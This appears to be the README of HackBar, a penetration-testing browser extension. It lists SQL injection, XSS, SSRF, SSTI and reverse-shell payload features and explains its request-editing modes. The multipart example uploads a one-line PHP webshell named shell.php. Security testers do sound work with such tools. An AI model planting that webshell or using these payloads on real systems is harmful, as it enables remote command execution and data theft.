A browser extension for Penetration Testing.

Available on Chrome Web Store and Firefox Add-ons.

• storage

  • Save theme preferences

• scripting

  • Perform POST request
  • Run test function

• webRequest

  • Remember request information
  • Listen finish event to clean up

• declarativeNetRequest

  • Set HTTP header value based on settings

• Load

  • From tab (default)
  • From cURL command

• Supported

  • HTTP methods
    • GET
    • POST
      • application/x-www-form-urlencoded
      • multipart/form-data
      • application/json
  • Request editing mode
    • Basic
    • Raw
  • Custom payload

• Auto Test

  • Common paths (Wordlist from dirsearch included)

• SQLi

  • Dump all database names (MySQL, PostgreSQL)
  • Dump tables from database (MySQL, PostgreSQL, SQLite)
  • Dump columns from database (MySQL, PostgreSQL, SQLite)
  • Union select statement (MySQL, PostgreSQL, SQLite)
  • Error-based injection statement (MySQL, PostgreSQL)
  • Dump in one shot payload (MySQL)
  • Dump current query payload (MySQL)
  • Space to Inline comment

• XSS

  • Vue.js XSS payloads
  • Angular.js XSS payloads for strict CSP
  • Some snippets for CTF
  • Html encode/decode with hex/dec/entity name
  • String.fromCharCode encode/decode

• LFI

  • PHP wrapper - Base64

• SSRF

  • AWS - IAM role name

• SSTI

  • Jinja2 SSTI
    • "From Flask config to RCE" Reference
  • Java SSTI

• Shell

  • Python reverse shell cheatsheet
  • sh(bash) reverse shell cheatsheet
  • nc(ncat) reverse shell cheatsheet
  • PHP webshell/reverse shell cheatsheet

• Encoding

  • URL encode/decode
  • Base64 encode/decode
  • Hexadecimal encode/decode
  • Unicode encode/decode
  • Escape ASCII with hex/oct

• Hashing

  • MD5
  • SHA1
  • SHA256
  • SHA384
  • SHA512

1. Open Developer tools (Press F12 or Ctrl + Shift + I)
2. Switch to HackBar tab
3. Enjoy it

After changing enctype field to multipart/form-data, you can put your payload into Body field such as the following:

------WebKitFormBoundarydbJBATDXCC6CL0lZ
Content-Disposition: form-data; name="user"

user
------WebKitFormBoundarydbJBATDXCC6CL0lZ
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/x-httpd-php

<?php passthru($_GET['c']); ?>
------WebKitFormBoundarydbJBATDXCC6CL0lZ--

We will consider the first line as boundary, and reconstruct a form element to send your request.

Therefore, sent boundary will not be the same as you typed.

After changing enctype field to application/json, you can put your payload into Body field such as the following:

{
  "username": "admin",
  "password": "admin"
}

If your payload doesn't contain =:

In order to post JSON data, we will insert a dummy field or object to your JSON such as the following:

{ "username": "admin", "password": "admin", "4dxnzjzd5mi": "=" }

For more details, please visit "Posting JSON with an HTML Form".

This mode is implemented via fetch API. It will try the best to send a request as same as you typed.

However, there are some limitations:

Request

• It is unable to use a specified HTTP protocol version.

  The protocol version is fixed to HTTP/1.1 in the editor, but what version used in a request is up to fetch behavior.

• Some HTTP headers may appear in a sent request even if you don't add them in the editor.
  e.g. Connection, Cache-Control, Pragma, etc.

  These headers will be assigned a default value. For example, Connection: keep-alive, Cache-Control: no-cache.

Response

• [Chrome] It always shows HTTP/1.1 if used protocol version is higher than or equal to HTTP/2.

  See also Chromium Code Search

See package.json for details.

• lebr0nli
• boylin0
• HSwift